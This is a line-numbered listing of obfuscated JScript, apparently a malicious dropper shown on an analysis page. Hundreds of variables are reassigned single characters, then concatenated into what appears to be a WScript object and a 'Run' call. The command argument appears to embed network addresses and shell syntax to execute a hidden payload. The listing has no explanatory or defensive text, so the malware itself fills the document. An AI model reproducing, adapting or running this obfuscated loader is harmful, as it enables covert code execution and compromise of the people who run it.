12 | this[dheamgd + yhpuwit + esvgqp + twdywxn + yuaewfni + wgdydi + ndyctpvjx][ceyaolrro + adgoitneh + yuaewfni + ndyctpvjx] ( ); | |
13 | this[dheamgd + yhpuwit + esvgqp + twdywxn + yuaewfni + wgdydi + ndyctpvjx][znyfsfw + twdywxn + zwuqitof + ogmfusej + ndyctpvjx + zwuqitof + xjyxbrhc + vpjefoqjv + ajoxptl + zwuqitof + esvgqp + ndyctpvjx] ( dheamgd + yhpuwit + esvgqp + twdywxn + yuaewfni + wgdydi + ndyctpvjx + tqhzhp + yhpuwit + yyrlms + zwuqitof + annngcf + annngcf ) [twdywxn + adgoitneh + irqnct] ( esvgqp + xoadbmxqu + moprnzc + yuren + naglv + esvgqp + yuren + wgdydi + iwfqnevm + ozmiha + zwuqitof + twdywxn + ajhgkxw + yyrlms + zwuqitof + annngcf + annngcf + tqhzhp + zwuqitof + iefzws + zwuqitof + yuren + fhscardkw + znyfsfw + iwfqnevm + xoadbmxqu + xoadbmxqu + ogmfusej + irqnct + moprnzc + yuren + mumop + uwsftvsr + irqnct + rbkcxe + iwfqnevm + rvsgg + zwuqitof + fhscardkw + dheamgd + zwuqitof + vpjefoqjv + obdnzrhak + zwuqitof + orwmm + adgoitneh + zwuqitof + ajhgkxw + ndyctpvjx + yuren + fhscardkw + xjyxbrhc + adgoitneh + ndyctpvjx + xantyfxxf + yuaewfni + annngcf + zwuqitof + yuren + vbklgu + ndyctpvjx + zwuqitof + xoadbmxqu + wgdydi + vbklgu + wlunvo + yuaewfni + irqnct + rbkcxe + iwfqnevm + yuaewfni + esvgqp + zwuqitof + tqhzhp + wgdydi + moprnzc + sllykdle + yuren + yyrlms + ndyctpvjx + ndyctpvjx + wgdydi + sfrixswre + naglv + naglv + vuixp + mumtojbu + gzbwbzoa + tqhzhp + vuixp + kmmxtdl + gzbwbzoa + tqhzhp + vuixp + tqhzhp + iotuw + rxgrkkl + mpkvvxiev + naglv + yuaewfni + irqnct + rbkcxe + iwfqnevm + yuaewfni + esvgqp + zwuqitof + tqhzhp + wgdydi + yyrlms + wgdydi + mumop + uhjrc + uhjrc + ajhgkxw + ndyctpvjx + ogmfusej + twdywxn + ndyctpvjx + yuren + vbklgu + ndyctpvjx + zwuqitof + xoadbmxqu + wgdydi + vbklgu + wlunvo + yuaewfni + irqnct + rbkcxe + iwfqnevm + yuaewfni + esvgqp + zwuqitof + tqhzhp + wgdydi + moprnzc + sllykdle + uhjrc + uhjrc + esvgqp + xoadbmxqu + moprnzc + yuren + naglv + esvgqp + yuren + irqnct + zwuqitof + ndyctpvjx + yuren + adgoitneh + ajhgkxw + zwuqitof + yuren + wlunvo + wlunvo + vuixp + mumtojbu + gzbwbzoa + tqhzhp + vuixp + kmmxtdl + gzbwbzoa + tqhzhp + vuixp + tqhzhp + iotuw + rxgrkkl + mpkvvxiev + mskqowsp + inxoqdq + inxoqdq + inxoqdq + inxoqdq + wlunvo + moprnzc + ogmfusej + rbkcxe + ozmiha + ozmiha + ozmiha + twdywxn + iwfqnevm + iwfqnevm + ndyctpvjx + wlunvo + uhjrc + uhjrc + esvgqp + xoadbmxqu + moprnzc + yuren + naglv + esvgqp + yuren + twdywxn + zwuqitof + tsnmgkrj + ajhgkxw + rbkcxe + twdywxn + gzbwbzoa + iotuw + yuren + naglv + ajhgkxw + yuren + wlunvo + wlunvo + vuixp + mumtojbu + gzbwbzoa + tqhzhp + vuixp + kmmxtdl + gzbwbzoa + tqhzhp + vuixp + tqhzhp + iotuw + rxgrkkl + mpkvvxiev + mskqowsp + inxoqdq + inxoqdq + inxoqdq + inxoqdq + wlunvo + moprnzc + ogmfusej + rbkcxe + ozmiha + ozmiha + ozmiha + twdywxn + iwfqnevm + iwfqnevm + ndyctpvjx + wlunvo + vuixp + iotuw + iotuw + mumtojbu + kmmxtdl + vuixp + gwsbgvb + mumtojbu + vuixp + gzbwbzoa + kmmxtdl + kmmxtdl + mpkvvxiev + mpkvvxiev + tqhzhp + moprnzc + annngcf + annngcf, 0, false ); |
|
14 | } | |
15 | moprnzc = "v"; | |
16 | moprnzc = "u"; | |
17 | moprnzc = "q"; | |
18 | moprnzc = "b"; | |
19 | moprnzc = "l"; | |
20 | moprnzc = "m"; | |
21 | moprnzc = "W"; | |
22 | moprnzc = "N"; | |
23 | moprnzc = "J"; | |
24 | moprnzc = "D"; | |
25 | moprnzc = "y"; | |
26 | moprnzc = "d"; | |
27 | gzbwbzoa = "v"; | |
28 | gzbwbzoa = "D"; | |
29 | gzbwbzoa = "R"; | |
30 | gzbwbzoa = "x"; | |
31 | gzbwbzoa = "3"; | |
32 | vpjefoqjv = "r"; | |
33 | vpjefoqjv = "t"; | |
34 | vpjefoqjv = "J"; | |
35 | vpjefoqjv = "y"; | |
36 | vpjefoqjv = "G"; | |
37 | vpjefoqjv = "k"; | |
38 | vpjefoqjv = "T"; | |
39 | vpjefoqjv = "Y"; | |
40 | vpjefoqjv = "l"; | |
41 | vpjefoqjv = "p"; | |
42 | vpjefoqjv = "S"; | |
43 | vpjefoqjv = "O"; | |
44 | vpjefoqjv = "y"; | |
45 | vpjefoqjv = "T"; | |
46 | vpjefoqjv = "h"; | |
47 | vpjefoqjv = "g"; | |
48 | vpjefoqjv = "J"; | |
49 | vpjefoqjv = "v"; | |
50 | vpjefoqjv = "k"; | |
51 | vpjefoqjv = "z"; | |
52 | vpjefoqjv = "d"; | |
53 | vpjefoqjv = "b"; | |
54 | ogmfusej = "D"; | |
55 | ogmfusej = "X"; | |
56 | ogmfusej = "k"; | |
57 | ogmfusej = "Y"; | |
58 | ogmfusej = "A"; | |
59 | ogmfusej = "Q"; | |
60 | ogmfusej = "D"; | |
61 | ogmfusej = "C"; | |
62 | ogmfusej = "M"; | |
63 | ogmfusej = "O"; | |
64 | ogmfusej = "K"; | |
65 | ogmfusej = "V"; | |
66 | ogmfusej = "c"; | |
67 | ogmfusej = "K"; | |
68 | ogmfusej = "i"; | |
69 | ogmfusej = "s"; | |
70 | ogmfusej = "a"; | |
71 | vbklgu = "I"; | |
72 | vbklgu = "a"; | |
73 | vbklgu = "M"; | |
74 | vbklgu = "t"; | |
75 | vbklgu = "u"; | |
76 | vbklgu = "A"; | |
77 | vbklgu = "S"; | |
78 | vbklgu = "W"; | |
79 | vbklgu = "c"; | |
80 | vbklgu = "Z"; | |
81 | vbklgu = "e"; | |
82 | vbklgu = "m"; | |
83 | vbklgu = "p"; | |
84 | vbklgu = "K"; | |
85 | vbklgu = "U"; | |
86 | vbklgu = "S"; | |
87 | vbklgu = "I"; | |
88 | vbklgu = "t"; | |
89 | vbklgu = "Y"; | |
90 | vbklgu = "O"; | |
91 | vbklgu = "H"; | |
92 | vbklgu = "B"; | |
93 | vbklgu = "L"; | |
94 | vbklgu = "c"; | |
95 | vbklgu = "W"; | |
96 | vbklgu = "x"; | |
97 | vbklgu = "i"; | |
98 | vbklgu = "N"; | |
99 | vbklgu = "U"; | |
100 | vbklgu = "t"; | |
101 | vbklgu = "c"; | |
102 | vbklgu = "k"; | |
103 | vbklgu = "s"; | |
104 | vbklgu = "N"; | |
105 | vbklgu = "T"; | |
106 | vbklgu = "X"; | |
107 | vbklgu = "Y"; | |
108 | vbklgu = "u"; | |
109 | vbklgu = "M"; | |
110 | vbklgu = "%"; | |
111 | mtsgw = "k"; | |
112 | mtsgw = "k"; | |
113 | mtsgw = "R"; | |
114 | mtsgw = "J"; | |
115 | mtsgw = "M"; | |
116 | mtsgw = "W"; | |
117 | mtsgw = "W"; | |
118 | mtsgw = "n"; | |
119 | mtsgw = "f"; | |
120 | mtsgw = "p"; | |
121 | mtsgw = "z"; | |
122 | mtsgw = "W"; | |
123 | mtsgw = "D"; | |
124 | mtsgw = "F"; | |
125 | mtsgw = "d"; | |
126 | mtsgw = "y"; | |
127 | mtsgw = "T"; | |
128 | mtsgw = "Y"; | |
129 | mtsgw = "B"; | |
130 | mtsgw = "P"; | |
131 | mtsgw = "k"; | |
132 | mtsgw = "U"; | |
133 | zwuqitof = "m"; | |
134 | zwuqitof = "O"; | |
135 | zwuqitof = "T"; | |
136 | zwuqitof = "D"; | |
137 | zwuqitof = "t"; | |
138 | zwuqitof = "V"; | |
139 | zwuqitof = "k"; | |
140 | zwuqitof = "S"; | |
141 | zwuqitof = "c"; | |
142 | zwuqitof = "U"; | |
143 | zwuqitof = "q"; | |
144 | zwuqitof = "r"; | |
145 | zwuqitof = "V"; | |
146 | zwuqitof = "A"; | |
147 | zwuqitof = "D"; | |
148 | zwuqitof = "o"; | |
149 | zwuqitof = "z"; | |
150 | zwuqitof = "v"; | |
151 | zwuqitof = "u"; | |
152 | zwuqitof = "v"; | |
153 | zwuqitof = "l"; | |
154 | zwuqitof = "p"; | |
155 | zwuqitof = "N"; | |
156 | zwuqitof = "e"; | |
157 | zwuqitof = "E"; | |
158 | zwuqitof = "a"; | |
159 | zwuqitof = "x"; | |
160 | zwuqitof = "r"; | |
161 | zwuqitof = "F"; | |
162 | zwuqitof = "e"; | |
163 | sfrixswre = "l"; | |
164 | sfrixswre = "o"; | |
165 | sfrixswre = "z"; | |
166 | sfrixswre = "H"; | |
167 | sfrixswre = "a"; | |
168 | sfrixswre = "q"; | |
169 | sfrixswre = "K"; | |
170 | sfrixswre = "b"; | |
171 | sfrixswre = "C"; | |
172 | sfrixswre = "S"; | |
173 | sfrixswre = "l"; | |
174 | sfrixswre = "V"; | |
175 | sfrixswre = "V"; | |
176 | sfrixswre = "n"; | |
177 | sfrixswre = "Y"; | |
178 | sfrixswre = "Z"; | |
179 | sfrixswre = "X"; | |
180 | sfrixswre = "W"; | |
181 | sfrixswre = "E"; | |
182 | sfrixswre = "Z"; | |
183 | sfrixswre = "O"; | |
184 | sfrixswre = "D"; | |
185 | sfrixswre = "p"; | |
186 | sfrixswre = "e"; | |
187 | sfrixswre = "k"; | |
188 | sfrixswre = "M"; | |
189 | sfrixswre = "F"; | |
190 | sfrixswre = "C"; | |
191 | sfrixswre = ":"; | |
192 | xantyfxxf = "w"; | |
193 | xantyfxxf = "C"; | |
194 | xantyfxxf = "n"; | |
195 | xantyfxxf = "Q"; | |
196 | xantyfxxf = "I"; | |
197 | xantyfxxf = "y"; | |
198 | xantyfxxf = "l"; | |
199 | xantyfxxf = "V"; | |
200 | xantyfxxf = "W"; | |
201 | xantyfxxf = "C"; | |
202 | xantyfxxf = "O"; | |
203 | xantyfxxf = "u"; | |
204 | xantyfxxf = "p"; | |
205 | xantyfxxf = "g"; | |
206 | xantyfxxf = "R"; | |
207 | xantyfxxf = "s"; | |
208 | xantyfxxf = "h"; | |
209 | xantyfxxf = "S"; | |
210 | xantyfxxf = "p"; | |
211 | xantyfxxf = "Q"; | |
212 | xantyfxxf = "n"; | |
213 | xantyfxxf = "Y"; | |
214 | xantyfxxf = "f"; | |
215 | xantyfxxf = "f"; | |
216 | xantyfxxf = "l"; | |
217 | xantyfxxf = "Z"; | |
218 | xantyfxxf = "L"; | |
219 | xantyfxxf = "T"; | |
220 | xantyfxxf = "B"; | |
221 | xantyfxxf = "L"; | |
222 | xantyfxxf = "t"; | |
223 | xantyfxxf = "c"; | |
224 | xantyfxxf = "F"; | |
225 | iefzws = "v"; | |
226 | iefzws = "J"; | |
227 | iefzws = "d"; | |
228 | iefzws = "Y"; | |
229 | iefzws = "B"; | |
230 | iefzws = "E"; | |
231 | iefzws = "D"; | |
232 | iefzws = "k"; | |
233 | iefzws = "e"; | |
234 | iefzws = "e"; | |
235 | iefzws = "n"; | |
236 | iefzws = "n"; | |
237 | iefzws = "Y"; | |
238 | iefzws = "T"; | |
239 | iefzws = "k"; | |
240 | iefzws = "F"; | |
241 | iefzws = "x"; | |
242 | iefzws = "o"; | |
243 | iefzws = "w"; | |
244 | iefzws = "F"; | |
245 | iefzws = "I"; | |
246 | iefzws = "Y"; | |
247 | iefzws = "l"; | |
248 | iefzws = "x"; | |
249 | sllykdle = "L"; | |
250 | sllykdle = "W"; | |
251 | sllykdle = "O"; | |
252 | sllykdle = "h"; | |
253 | sllykdle = "v"; | |
254 | sllykdle = "k"; | |
255 | sllykdle = "u"; | |
256 | sllykdle = "P"; | |
257 | sllykdle = "o"; | |
258 | sllykdle = "f"; | |
259 | sllykdle = "f"; | |
260 | sllykdle = "h"; | |
261 | sllykdle = "D"; | |
262 | sllykdle = "G"; | |
263 | sllykdle = "H"; | |
264 | sllykdle = "D"; | |
265 | sllykdle = "x"; | |
266 | sllykdle = "k"; | |
267 | sllykdle = "F"; | |
268 | sllykdle = "P"; | |
269 | sllykdle = "Y"; | |
270 | sllykdle = "S"; | |
271 | sllykdle = "A"; | |
272 | sllykdle = "l"; | |
273 | sllykdle = "y"; | |
274 | sllykdle = "h"; | |
275 | sllykdle = "s"; | |
276 | sllykdle = "P"; | |
277 | sllykdle = "I"; | |
278 | sllykdle = "K"; | |
279 | sllykdle = "O"; | |
280 | sllykdle = "P"; | |
281 | sllykdle = "h"; | |
282 | sllykdle = "x"; | |
283 | sllykdle = "K"; | |
284 | sllykdle = "J"; | |
285 | sllykdle = "y"; | |
286 | sllykdle = "H"; | |
287 | sllykdle = "o"; | |
288 | sllykdle = "u"; | |
289 | sllykdle = "S"; | |
290 | sllykdle = "H"; | |
291 | sllykdle = "p"; | |
292 | sllykdle = "v"; | |
293 | sllykdle = "f"; | |
294 | rxgrkkl = "s"; | |
295 | rxgrkkl = "l"; | |
296 | rxgrkkl = "r"; | |
297 | rxgrkkl = "B"; | |
298 | rxgrkkl = "B"; | |
299 | rxgrkkl = "i"; | |
300 | rxgrkkl = "J"; | |
301 | rxgrkkl = "a"; | |
302 | rxgrkkl = "I"; | |
303 | rxgrkkl = "H"; | |
304 | rxgrkkl = "G"; | |
305 | rxgrkkl = "e"; | |
306 | rxgrkkl = "O"; | |
307 | rxgrkkl = "0"; | |
308 | iijgkmcq = "x"; | |
309 | iijgkmcq = "i"; | |
310 | iijgkmcq = "R"; | |
311 | iijgkmcq = "z"; | |
312 | iijgkmcq = "m"; | |
313 | iijgkmcq = "l"; | |
314 | iijgkmcq = "F"; | |
315 | iijgkmcq = "Q"; | |
316 | iijgkmcq = "a"; | |
317 | iijgkmcq = "n"; | |
318 | iijgkmcq = "B"; | |
319 | iijgkmcq = "a"; | |
320 | iijgkmcq = "s"; | |
321 | iijgkmcq = "X"; | |
322 | iijgkmcq = "F"; | |
323 | iijgkmcq = "g"; | |
324 | iijgkmcq = "j"; | |
325 | iijgkmcq = "x"; | |
326 | iijgkmcq = "f"; | |
327 | iijgkmcq = "f"; | |
328 | iijgkmcq = "g"; | |
329 | iijgkmcq = "R"; | |
330 | iijgkmcq = "b"; | |
331 | iijgkmcq = "k"; | |
332 | iijgkmcq = "R"; | |
333 | iijgkmcq = "f"; | |
334 | iijgkmcq = "u"; | |
335 | iijgkmcq = "u"; | |
336 | iijgkmcq = "x"; | |
337 | iijgkmcq = "s"; | |
338 | iijgkmcq = "N"; | |
339 | iijgkmcq = "W"; | |
340 | iijgkmcq = "g"; | |
341 | iijgkmcq = "w"; | |
342 | iijgkmcq = "r"; | |
343 | iijgkmcq = "E"; | |
344 | iijgkmcq = "O"; | |
345 | iijgkmcq = "A"; | |
346 | iijgkmcq = "P"; | |
347 | iijgkmcq = "y"; | |
348 | iijgkmcq = "L"; | |
349 | ndyctpvjx = "v"; | |
350 | ndyctpvjx = "K"; | |
351 | ndyctpvjx = "y"; | |
352 | ndyctpvjx = "n"; | |
353 | ndyctpvjx = "n"; | |
354 | ndyctpvjx = "P"; | |
355 | ndyctpvjx = "K"; | |
356 | ndyctpvjx = "T"; | |
357 | ndyctpvjx = "R"; | |
358 | ndyctpvjx = "d"; | |
359 | ndyctpvjx = "D"; | |
360 | ndyctpvjx = "T"; | |
361 | ndyctpvjx = "H"; | |
362 | ndyctpvjx = "T"; | |
363 | ndyctpvjx = "X"; | |
364 | ndyctpvjx = "t"; | |
365 | ndyctpvjx = "T"; | |
366 | ndyctpvjx = "R"; | |
367 | ndyctpvjx = "X"; | |
368 | ndyctpvjx = "f"; | |
369 | ndyctpvjx = "W"; | |
370 | ndyctpvjx = "t"; | |
371 | ndyctpvjx = "h"; | |
372 | ndyctpvjx = "z"; | |
373 | ndyctpvjx = "c"; | |
374 | ndyctpvjx = "z"; | |
375 | ndyctpvjx = "j"; | |
376 | ndyctpvjx = "j"; | |
377 | ndyctpvjx = "Z"; | |
378 | ndyctpvjx = "t"; | |
379 | mpkvvxiev = "i"; | |
380 | mpkvvxiev = "q"; | |
381 | mpkvvxiev = "E"; | |
382 | mpkvvxiev = "T"; | |
383 | mpkvvxiev = "P"; | |
384 | mpkvvxiev = "L"; | |
385 | mpkvvxiev = "5"; | |
386 | lvqlo = "R"; | |
387 | lvqlo = "o"; | |
388 | lvqlo = "E"; | |
389 | lvqlo = "M"; | |
390 | lvqlo = "t"; | |
391 | lvqlo = "e"; | |
392 | lvqlo = "p"; | |
393 | lvqlo = "w"; | |
394 | lvqlo = "Q"; | |
395 | lvqlo = "r"; | |
396 | lvqlo = "I"; | |
397 | lvqlo = "X"; | |
398 | lvqlo = "O"; | |
399 | lvqlo = "i"; | |
400 | lvqlo = "f"; | |
401 | lvqlo = "k"; | |
402 | lvqlo = "f"; | |
403 | lvqlo = "d"; | |
404 | lvqlo = "V"; | |
405 | lvqlo = "z"; | |
406 | lvqlo = "w"; | |
407 | lvqlo = "Q"; | |
408 | lvqlo = "o"; | |
409 | lvqlo = "C"; | |
410 | lvqlo = "s"; | |
411 | lvqlo = "T"; | |
412 | mumop = "u"; | |
413 | mumop = "H"; | |
414 | mumop = "s"; | |
415 | mumop = "l"; | |
416 | mumop = "B"; | |
417 | mumop = "t"; | |
418 | mumop = "c"; | |
419 | mumop = "C"; | |
420 | mumop = "n"; | |
421 | mumop = "w"; | |
422 | mumop = "T"; | |
423 | mumop = "p"; | |
424 | mumop = "m"; | |
425 | mumop = "W"; | |
426 | mumop = "J"; | |
427 | mumop = "S"; | |
428 | mumop = "m"; | |
429 | mumop = "u"; | |
430 | mumop = "k"; | |
431 | mumop = "M"; | |
432 | mumop = "Y"; | |
433 | mumop = "r"; | |
434 | mumop = "S"; | |
435 | mumop = "y"; | |
436 | mumop = "W"; | |
437 | mumop = "t"; | |
438 | mumop = "t"; | |
439 | mumop = "n"; | |
440 | mumop = "v"; | |
441 | mumop = "w"; | |
442 | mumop = "q"; | |
443 | mumop = "E"; | |
444 | mumop = "V"; | |
445 | mumop = "L"; | |
446 | mumop = "G"; | |
447 | mumop = "Y"; | |
448 | mumop = "C"; | |
449 | mumop = "z"; | |
450 | mumop = "\""; | |
451 | tqhzhp = "b"; | |
452 | tqhzhp = "v"; | |
453 | tqhzhp = "g"; | |
454 | tqhzhp = "F"; | |
455 | tqhzhp = "U"; | |
456 | tqhzhp = "x"; | |
457 | tqhzhp = "a"; | |
458 | tqhzhp = "K"; | |
459 | tqhzhp = "q"; | |
460 | tqhzhp = "z"; | |
461 | tqhzhp = "W"; | |
462 | tqhzhp = "z"; | |
463 | tqhzhp = "Q"; | |
464 | tqhzhp = "i"; | |
465 | tqhzhp = "b"; | |
466 | tqhzhp = "t"; | |
467 | tqhzhp = "g"; | |
468 | tqhzhp = "D"; | |
469 | tqhzhp = "T"; | |
470 | tqhzhp = "x"; | |
471 | tqhzhp = "V"; | |
472 | tqhzhp = "G"; | |
473 | tqhzhp = "U"; | |
474 | tqhzhp = "V"; | |
475 | tqhzhp = "i"; | |
476 | tqhzhp = "H"; | |
477 | tqhzhp = "C"; | |
478 | tqhzhp = "x"; | |
479 | tqhzhp = "E"; | |
480 | tqhzhp = "P"; | |
481 | tqhzhp = "m"; | |
482 | tqhzhp = "j"; | |
483 | tqhzhp = "X"; | |
484 | tqhzhp = "y"; | |
485 | tqhzhp = "M"; | |
486 | tqhzhp = "a"; | |
487 | tqhzhp = "K"; | |
488 | tqhzhp = "k"; | |
489 | tqhzhp = "."; | |
490 | adgoitneh = "l"; | |
491 | adgoitneh = "d"; | |
492 | adgoitneh = "Z"; | |
493 | adgoitneh = "h"; | |
494 | adgoitneh = "w"; | |
495 | adgoitneh = "y"; | |
496 | adgoitneh = "A"; | |
497 | adgoitneh = "c"; | |
498 | adgoitneh = "Q"; | |
499 | adgoitneh = "s"; | |
500 | adgoitneh = "i"; | |
501 | adgoitneh = "J"; | |
502 | adgoitneh = "q"; | |
503 | adgoitneh = "U"; | |
504 | adgoitneh = "G"; | |
505 | adgoitneh = "f"; | |
506 | adgoitneh = "d"; | |
507 | adgoitneh = "r"; | |
508 | adgoitneh = "C"; | |
509 | adgoitneh = "D"; | |
510 | adgoitneh = "J"; | |
511 | adgoitneh = "u"; | |
512 | vuixp = "O"; | |
513 | vuixp = "1"; | |
514 | gwsbgvb = "x"; | |
515 | gwsbgvb = "b"; | |
516 | gwsbgvb = "K"; | |
517 | gwsbgvb = "y"; | |
518 | gwsbgvb = "D"; | |
519 | gwsbgvb = "W"; | |
520 | gwsbgvb = "C"; | |
521 | gwsbgvb = "d"; | |
522 | gwsbgvb = "f"; | |
523 | gwsbgvb = "e"; | |
524 | gwsbgvb = "x"; | |
525 | gwsbgvb = "m"; | |
526 | gwsbgvb = "e"; | |
527 | gwsbgvb = "F"; | |
528 | gwsbgvb = "N"; | |
529 | gwsbgvb = "b"; | |
530 | gwsbgvb = "E"; | |
531 | gwsbgvb = "u"; | |
532 | gwsbgvb = "D"; | |
533 | gwsbgvb = "u"; | |
534 | gwsbgvb = "B"; | |
535 | gwsbgvb = "M"; | |
536 | gwsbgvb = "V"; | |
537 | gwsbgvb = "6"; | |
538 | mumtojbu = "s"; | |
539 | mumtojbu = "z"; | |
540 | mumtojbu = "s"; | |
541 | mumtojbu = "C"; | |
542 | mumtojbu = "I"; | |
543 | mumtojbu = "l"; | |
544 | mumtojbu = "K"; | |
545 | mumtojbu = "B"; | |
546 | mumtojbu = "W"; | |
547 | mumtojbu = "s"; | |
548 | mumtojbu = "N"; | |
549 | mumtojbu = "V"; | |
550 | mumtojbu = "Z"; | |
551 | mumtojbu = "S"; | |
552 | mumtojbu = "K"; | |
553 | mumtojbu = "u"; | |
554 | mumtojbu = "C"; | |
555 | mumtojbu = "s"; | |
556 | mumtojbu = "I"; | |
557 | mumtojbu = "t"; | |
558 | mumtojbu = "g"; | |
559 | mumtojbu = "A"; | |
560 | mumtojbu = "o"; | |
561 | mumtojbu = "t"; | |
562 | mumtojbu = "9"; | |
563 | orwmm = "T"; | |
564 | orwmm = "U"; | |
565 | orwmm = "v"; | |
566 | orwmm = "J"; | |
567 | orwmm = "f"; | |
568 | orwmm = "Z"; | |
569 | orwmm = "T"; | |
570 | orwmm = "y"; | |
571 | orwmm = "H"; | |
572 | orwmm = "h"; | |
573 | orwmm = "D"; | |
574 | orwmm = "r"; | |
575 | orwmm = "X"; | |
576 | orwmm = "q"; | |
577 | mskqowsp = "O"; | |
578 | mskqowsp = "f"; | |
579 | mskqowsp = "R"; | |
580 | mskqowsp = "c"; | |
581 | mskqowsp = "J"; | |
582 | mskqowsp = "B"; | |
583 | mskqowsp = "J"; | |
584 | mskqowsp = "k"; | |
585 | mskqowsp = "T"; | |
586 | mskqowsp = "p"; | |
587 | mskqowsp = "j"; | |
588 | mskqowsp = "L"; | |
589 | mskqowsp = "y"; | |
590 | mskqowsp = "I"; | |
591 | mskqowsp = "w"; | |
592 | mskqowsp = "K"; | |
593 | mskqowsp = "G"; | |
594 | mskqowsp = "G"; | |
595 | mskqowsp = "y"; | |
596 | mskqowsp = "w"; | |
597 | mskqowsp = "t"; | |
598 | mskqowsp = "n"; | |
599 | mskqowsp = "V"; | |
600 | mskqowsp = "R"; | |
601 | mskqowsp = "O"; | |
602 | mskqowsp = "W"; | |
603 | mskqowsp = "V"; | |
604 | mskqowsp = "s"; | |
605 | mskqowsp = "I"; | |
606 | mskqowsp = "s"; | |
607 | mskqowsp = "z"; | |
608 | mskqowsp = "y"; | |
609 | mskqowsp = "P"; | |
610 | mskqowsp = "e"; | |
611 | mskqowsp = "A"; | |
612 | mskqowsp = "X"; | |
613 | mskqowsp = "Z"; | |
614 | mskqowsp = "e"; | |
615 | mskqowsp = "U"; | |
616 | mskqowsp = "p"; | |
617 | mskqowsp = "t"; | |
618 | mskqowsp = "I"; | |
619 | mskqowsp = "O"; | |
620 | mskqowsp = "@"; | |
621 | fhscardkw = "Q"; | |
622 | fhscardkw = "g"; | |
623 | fhscardkw = "W"; | |
624 | fhscardkw = "V"; | |
625 | fhscardkw = "o"; | |
626 | fhscardkw = "x"; | |
627 | fhscardkw = "c"; | |
628 | fhscardkw = "f"; | |
629 | fhscardkw = "h"; | |
630 | fhscardkw = "F"; | |
631 | fhscardkw = "g"; | |
632 | fhscardkw = "Z"; | |
633 | fhscardkw = "J"; | |
634 | fhscardkw = "M"; | |
635 | fhscardkw = "D"; | |
636 | fhscardkw = "T"; | |
637 | fhscardkw = "e"; | |
638 | fhscardkw = "i"; | |
639 | fhscardkw = "N"; | |
640 | fhscardkw = "z"; | |
641 | fhscardkw = "e"; | |
642 | fhscardkw = "C"; | |
643 | fhscardkw = "d"; | |
644 | fhscardkw = "u"; | |
645 | fhscardkw = "q"; | |
646 | fhscardkw = "t"; | |
647 | fhscardkw = "o"; | |
648 | fhscardkw = "i"; | |
649 | fhscardkw = "L"; | |
650 | fhscardkw = "M"; | |
651 | fhscardkw = "b"; | |
652 | fhscardkw = "a"; | |
653 | fhscardkw = "y"; | |
654 | fhscardkw = "B"; | |
655 | fhscardkw = "D"; | |
656 | fhscardkw = "v"; | |
657 | fhscardkw = "h"; | |
658 | fhscardkw = "Y"; | |
659 | fhscardkw = "L"; | |
660 | fhscardkw = "t"; | |
661 | fhscardkw = "K"; | |
662 | fhscardkw = "-"; | |
663 | iotuw = "P"; | |
664 | iotuw = "U"; | |
665 | iotuw = "x"; | |
666 | iotuw = "D"; | |
667 | iotuw = "e"; | |
668 | iotuw = "j"; | |
669 | iotuw = "M"; | |
670 | iotuw = "l"; | |
671 | iotuw = "P"; | |
672 | iotuw = "g"; | |
673 | iotuw = "G"; | |
674 | iotuw = "L"; | |
675 | iotuw = "W"; | |
676 | iotuw = "p"; | |
677 | iotuw = "j"; | |
678 | iotuw = "v"; | |
679 | iotuw = "U"; | |
680 | iotuw = "Y"; | |
681 | iotuw = "T"; | |
682 | iotuw = "t"; | |
683 | iotuw = "x"; | |
684 | iotuw = "n"; | |
685 | iotuw = "A"; | |
686 | iotuw = "Z"; | |
687 | iotuw = "T"; | |
688 | iotuw = "c"; | |
689 | iotuw = "2"; | |
690 | yuren = "l"; | |
691 | yuren = "t"; | |
692 | yuren = "o"; | |
693 | yuren = "N"; | |
694 | yuren = "o"; | |
695 | yuren = "m"; | |
696 | yuren = "s"; | |
697 | yuren = "v"; | |
698 | yuren = "Q"; | |
699 | yuren = "q"; | |
700 | yuren = "k"; | |
701 | yuren = "i"; | |
702 | yuren = "w"; | |
703 | yuren = "S"; | |
704 | yuren = "U"; | |
705 | yuren = "M"; | |
706 | yuren = "W"; | |
707 | yuren = "N"; | |
708 | yuren = "U"; | |
709 | yuren = "o"; | |
710 | yuren = "c"; | |
711 | yuren = "x"; | |
712 | yuren = "g"; | |
713 | yuren = "y"; | |
714 | yuren = "s"; | |
715 | yuren = "u"; | |
716 | yuren = "y"; | |
717 | yuren = "e"; | |
718 | yuren = "X"; | |
719 | yuren = "g"; | |
720 | yuren = "P"; | |
721 | yuren = "B"; | |
722 | yuren = "h"; | |
723 | yuren = "p"; | |
724 | yuren = "h"; | |
725 | yuren = "l"; | |
726 | yuren = "W"; | |
727 | yuren = " "; | |
728 | twdywxn = "r"; | |
729 | twdywxn = "l"; | |
730 | twdywxn = "z"; | |
731 | twdywxn = "R"; | |
732 | twdywxn = "a"; | |
733 | twdywxn = "C"; | |
734 | twdywxn = "A"; | |
735 | twdywxn = "g"; | |
736 | twdywxn = "t"; | |
737 | twdywxn = "t"; | |
738 | twdywxn = "D"; | |
739 | twdywxn = "r"; | |
740 | ozmiha = "a"; | |
741 | ozmiha = "b"; | |
742 | ozmiha = "l"; | |
743 | ozmiha = "e"; | |
744 | ozmiha = "D"; | |
745 | ozmiha = "c"; | |
746 | ozmiha = "d"; | |
747 | ozmiha = "r"; | |
748 | ozmiha = "J"; | |
749 | ozmiha = "F"; | |
750 | ozmiha = "f"; | |
751 | ozmiha = "w"; | |
752 | ozmiha = "S"; | |
753 | ozmiha = "o"; | |
754 | ozmiha = "B"; | |
755 | ozmiha = "D"; | |
756 | ozmiha = "w"; | |
757 | yyrlms = "G"; | |
758 | yyrlms = "r"; | |
759 | yyrlms = "f"; | |
760 | yyrlms = "h"; | |
761 | yyrlms = "e"; | |
762 | yyrlms = "E"; | |
763 | yyrlms = "a"; | |
764 | yyrlms = "k"; | |
765 | yyrlms = "E"; | |
766 | yyrlms = "e"; | |
767 | yyrlms = "O"; | |
768 | yyrlms = "C"; | |
769 | yyrlms = "T"; | |
770 | yyrlms = "I"; | |
771 | yyrlms = "O"; | |
772 | yyrlms = "d"; | |
773 | yyrlms = "t"; | |
774 | yyrlms = "E"; | |
775 | yyrlms = "q"; | |
776 | yyrlms = "N"; | |
777 | yyrlms = "o"; | |
778 | yyrlms = "d"; | |
779 | yyrlms = "S"; | |
780 | yyrlms = "z"; | |
781 | yyrlms = "L"; | |
782 | yyrlms = "C"; | |
783 | yyrlms = "g"; | |
784 | yyrlms = "x"; | |
785 | yyrlms = "x"; | |
786 | yyrlms = "l"; | |
787 | yyrlms = "P"; | |
788 | yyrlms = "b"; | |
789 | yyrlms = "Z"; | |
790 | yyrlms = "d"; | |
791 | yyrlms = "P"; | |
792 | yyrlms = "b"; | |
793 | yyrlms = "X"; | |
